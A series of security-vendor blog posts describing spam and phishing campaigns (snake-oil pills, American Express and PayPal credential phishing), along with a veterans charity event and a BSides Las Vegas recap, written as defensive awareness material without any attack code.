Who doesn’t recall at some point seeing a late night television infomercial pitching some sort of “miracle” product that you just have to have? How about a magical pill that had the power to melt away that unwanted pounds or give you all the energy you could possibly want? These types of snake oil products aren’t just doomed to be promoted through infomercials. Email spammers want their share of the profits also. The security research team at AppRiver has spotted a snake oil campaign earlier this week. The email blast is a marketing email for a “brain enhancement” pill that claims to help you “think like Bill Gates.”

The email is cleverly disguised in a newsletter format reminiscent to that of what larger media publications use. Besides the outlandish claims inside the message, the spammers also injected random, hidden text within the email to trick spam filters into thinking the email is not spam. This is known as text stuffing. 


The email contains a link to a website that goes into more detail about the brain enhancement product. The website again is mocked up to resemble a news publication, along with a fake Facebook “Like” counter, Amazon product reviews, excerpts from clinical case studies and more. After a few seconds on the site, we were prompted to purchase the product at 75% off.


While not your typical malware threat, snake oil campaigns can be destructive in their own right, usually financially. It’s always best to get independent verification on marketing emails like these if you decide to try a product or service you’re unfamiliar with. A quick Google search can usually provide hints at the legitimacy of an email blast such as this. Because the campaign utilized common tactics known to spammers like text stuffing, multiple sending domains and questionable data, we can safely assume that the legitimacy of this email blast should be questioned.

AppRiver’s SecureTide spam & virus filter has quarantined around 14,300+ of these messages so far, preventing them from reaching our customers’ inboxes.

This week’s Threat Thursday focuses on a newly spotted social engineering campaign targeting American Express customers. The email blast seeks to trick users into providing highly sensitive information such as their social security number, credit card information and other personal identifiers. The email informs the recipient that a phone call requesting a one-time password was made to them in regards to a recent transaction. Those who did not receive a phone call are instructed to click on the provided link in the message which directs to an exploited website.


The exploited site is an accurate recreation of American Express’ website. The throw-away domain for this campaign was created one week ago. This of course is a huge red flag. In the screenshots below, the cyber criminals seek to obtain various personal information from American Express customers. It’s highly unusual for a financial institution to ask for this amount of information for account verification purposes.




Once all of the information has been filled out and submitted, the website redirects to the official American Express homepage. This campaign was well thought out and executed. Besides the information presented above, other red flags our security research team noticed were the sender’s address of the email. It’s been spoofed to appear to come from a legitimate Amex email address. The originating IP addresses and language used in the campaign also provided hits to the legitimacy of this message.

AppRiver’s SecureTide filter has various rules in place to keep these messages from reaching our customers. 8600+ emails have been blocked at the time of this writing.


From left: Wounded Veteran and comedian Bobby Henline, Gold Star Dad Tim Scherer, Sr., and AppRiver executive vice president Rocco Donnino.

This past weekend, AppRiver was proud to honor true heroes during the 4th annual Cow Harbor Warrior Weekend in Northport, Long Island, New York. The three-day weekend of appreciation, recreation and celebration welcomed and honored twelve veterans and their family members and included a golf tournament, 4-mile warrior run, beach activities, clambake fundraiser and live entertainment from Common Ground and the inspiring comedian Bobby Henline, as well as wonderful food and fellowship throughout. We recognize that genuine heroes live among us in every community throughout the United States and it was an honor to show our appreciation not only for their sacrifice, but also for the inspiration they provide.flag

Cow Harbor Warriors is a 501(c)(3) non-profit organization that was founded in 2012 by AppRiver executive vice president Rocco Donnino for the purpose of honoring and enabling individuals who served in Operation Iraqi Freedom and Operation Enduring Freedom. With the Cow Harbor Warrior Weekend, as well as other fundraising efforts and events, the organization strives to raise awareness for and to support wounded veterans/veterans in need. For more information about Cow Harbor Warriors, please visit www.cowharborwarriors.com.

While summer invokes nostalgia of beaches, volleyball, and sunscreen for many, white hats look forward to a different kind of trip every summer. Every summer brings the anticipation of what is known as “Hacker Summer Camp” to mind. This year did not let us down. For those of you who are not familiar with this, Las Vegas is the scene of what amounts to the largest gatherings of hackers and InfoSec enthusiasts in the world. Three big conferences, BSides Las Vegas, BlackHat and DEF CON all take place over the course of a week in late July / early August. This year’s events took place during the week of August 1st, 2016 starting with BSides Las Vegas. I was fortunate enough to be able to attend BSides Las Vegas and DEF CON.

BSides Las Vegas is an amazing conglomeration of everything security from CTF (Capture the Flag) competitions with the Pros vs. Joes event to the Lockpick Village and The Hacker Pyramid and other interesting contests run by the vendors that participate. Vendors that participate are more interested in what you have to offer them as opposed to what they can sell you. Most, if not all, the vendors participated in the Hire Ground track which offered extensive help to those wanting to find work or simply hone their resumes and interviewing skills.

The talks are categorized into well-defined tracks that each have an underlying theme. Each talk is recorded and can be found on YouTube. I was fortunate to be accepted to give a talk this year in the Proving Ground track. My talk can be found here if you are interested. In addition to my talk, there were more than 100 other talks and panels given by some amazingly talented people spread throughout seven different tracks. One of the tracks was made up entirely of workshops and classes. The best part is that everything is 100% free! That’s right, just show up and get a badge and away you go. Some of the topics include:

These are but a few of the great talks and workshops presented at BSides Las Vegas. Some talks are quite sensitive in nature, are given under strict security and not filmed or recorded in any way. Aside from the talk content and insight, this conference is small enough for more one-on-one interaction and discussion away from the tracks. It is often in these dialogues that you learn the most and expand you network of contacts and colleagues.

There are also a multitude of social events including a pool party, the Super Soaked Hackers water balloon fight benefiting Hack4Kids, the ever exciting Hacker Pyramid and various auctions benefiting EFF and BSides Las Vegas.

I arrived a day early so that I could participate in the practice in the speaker practice session on Monday afternoon. Tuesday and Wednesday were filled with time attending talks, presenting, visiting the many vendors and learning tables, interacting with people I hadn’t seen since previous events and socializing. You have to be somewhat organized and plan ahead so that you can maximize your time and get the most out of the time spent. I will still be going back and reviewing the videos of talks that were of interest but conflicted with others commitments. What you learn at an event like this is far more than you might expect. Digesting everything and putting it use means going back later and reviewing or rehashing talks and extracting those pearls that make your life in InfoSec easier.

Attending conferences like BSides Las Vegas helps expand your vision and view of the world, helping you better understand what is trending in the world of InfoSec. This year was my second time attending and I already plan on returning next summer.

If you are a regular DEF CON or BlackHat attendee, make plans to come a few days early and check out BSides Las Vegas. The costs are minimal. You will be pleasantly surprised. I will discuss my DEF CON adventures in an upcoming post.


An onslaught of PayPal themed messages have been hitting our filters over the past few weeks. Utilization of attached (.)HTM/HTML files to distribute malware and phishing attacks has been actively used for the better part of a decade now. This file type is still considered relatively low risk since they are still shared for legitimate purposes quite regularly–despite that fact that they are used for evil with even greater regularity.

One particular variant poses as a security alert from PayPal. It utilizes an attached (.)HTM file (containing an embedded script) in an attempt to trick users into disclosing a bevy of personal and financial information. Thus far, we have quarantined roughly 250K messages from this particular campaign. In addition to phishing a potentially devastating amount of information from the target, beneath the surface the obfuscated script also serves to install malware onto the victim’s machine.

Clicking the attached (.)HTM file begins the process. The phishing pages rendered attempt to gather a great deal of information such as PayPal credentials, mother’s maiden name, social security and credit card data– in a series of three consecutive phishing pages (displayed below).

page 12016-09-09_9-55-29b

page 2


page 3


Remember, a legitimate security alert should never require direct interaction with an email attachment. Should you ever find yourself on the receiving end of a message of this nature, reach out to the company directly to voice your concern.

If you suspect you may have fallen victim to phishing or think your credentials have been exposed through some other means (such as a data breach) you should take immediate proactive measures to help reduce the potential impact. Always contact the provider immediately for their recommended course of action. Change your password for not only the effected account but also for any others where you may be using the same or similar password but surely no one is doing that… right?